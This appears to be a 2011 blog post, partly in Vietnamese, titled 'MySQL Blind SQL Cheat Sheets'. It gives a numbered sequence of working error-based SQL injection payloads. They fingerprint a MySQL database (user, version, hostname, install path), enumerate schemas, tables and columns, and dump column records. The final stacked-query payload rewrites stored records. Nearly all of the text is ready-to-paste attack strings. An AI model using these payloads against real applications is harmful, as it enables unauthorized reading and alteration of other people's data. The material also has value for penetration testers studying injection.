1. To test blind injection
Trích dẫn:
' and 'x'='x
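2. To select the current database (output will be in hexadecimal; decode it to ASCII). The queries from here through step 16 are error-based rather than truly blind: they depend on the MySQL duplicate-entry error text being echoed back in the response, so they return nothing where the application suppresses database error messages or binds the parameter instead of concatenating it into the query.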
Trích dẫn:
' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3. To find the current user
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
4. To find MySQL Version
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
5. Find current database
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
6. To find the system user
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
7. To find the hostname
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
8. To find the installation directory
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
9. To find the DB User
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
10. To find the databases
Note: Keep incrementing n (n, n+1, n+2, ...) for as long as you keep getting a response.
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
11. To count the number of tables in the selected database
Note: Record this count as n.
Replace the placeholder strings (coloured in the original post, e.g. hex_code_of_database_name) with the appropriate values.
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
12. To get the table names in the selected database
Note: m-n means the query is run once for each offset m, m+1, …, n-1.
Replace the placeholder strings (coloured in the original post, e.g. hex_code_of_database_name) with the appropriate values.
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
13. To get number of columns in the selected table name
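Note: Record this count as n.
Replace the placeholder strings (coloured in the original post, e.g. hex_code_of_database_name and hex_code_of_table_name) with the appropriate values.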
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
14. To get column names of a selected table name
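Note: m-n means the query is run once for each offset m, m+1, …, n-1.
Replace the placeholder strings (coloured in the original post, e.g. hex_code_of_database_name and hex_code_of_table_name) with the appropriate values.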
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
15. To count the number of records in a selected column
Note: Remember this count as n
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,count
,0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
16. To fetch records from a selected column
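Note: m-n means the query is run once for each offset m, m+1, …, n-1.
Replace the placeholder strings (coloured in the original post, e.g. database_name, table_name and column_name) with the appropriate values.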
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
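17. Update a record in the selected column. This relies on stacked queries, so it only applies where the application's database interface accepts multiple statements in one call and the connecting account holds the UPDATE privilege on the table; a read-only, least-privilege account blocks it.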
Trích dẫn:
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--
Thứ Ba, 14 tháng 6, 2011
MySQL Blind SQL Cheat Sheets